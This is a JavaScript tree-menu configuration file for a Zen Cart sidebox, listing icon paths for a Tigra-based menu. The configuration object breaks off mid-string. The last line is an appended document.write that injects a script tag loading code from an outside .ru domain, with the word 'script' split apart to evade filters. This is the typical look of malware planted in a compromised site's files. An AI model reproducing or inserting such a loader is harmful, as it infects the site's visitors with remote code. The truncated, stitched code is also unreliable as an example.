/**
 * treemenu sidebox 
 *
 * @package templateSystem
 * @copyright Copyright 2007 Andrew Berezin eCommerce-Service.com
 * @copyright Copyright 2003-2005 Zen Cart Development Team
 * @copyright Portions Copyright 2004 Medreces medreces@yandex.ru
 * @copyright Portions Copyright http://www.softcomplex.com/products/tigra_menu_tree/
 * @license http://www.zen-cart.com/license/2_0.txt GNU Public License V2.0
 * @version $Id: treemenu.js 1.0 23.05.2007 11:24 Andrew Berezin andrew@ecommerce-service.com $
 */
/*
    Feel free to use your custom icons for the tree. Make sure they are all of the same size.
    User icons collections are welcome, we'll publish them giving all regards.
*/

var TREE_TPL = {
    'target'  : '_self',    // name of the frame links will be opened in
                            // other possible values are: _blank, _parent,
                            // _search, _self and _top

    'icon_e'  : tree_icons_dir + '/empty.gif', // empty image
    'icon_l'  : tree_icons_dir + '/line.gif',  // vertical line

    'icon_32' : tree_icons_dir + '/base.gif',   // root leaf icon normal
    'icon_36' : tree_icons_dir + '/base.gif',   // root leaf icon selected

    'icon_48' : tree_icons_dir + '/empty.gif',   // root icon normal
    'icon_52' : tree_icons_dir + '/empty.gif',   // root icon selected
    'icon_56' : tree_icons_dir + '/empty.gif',   // root icon opened
    'icon_60' : tree_icons_dir + '/

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Telecommunications.js"></scri'+'pt>');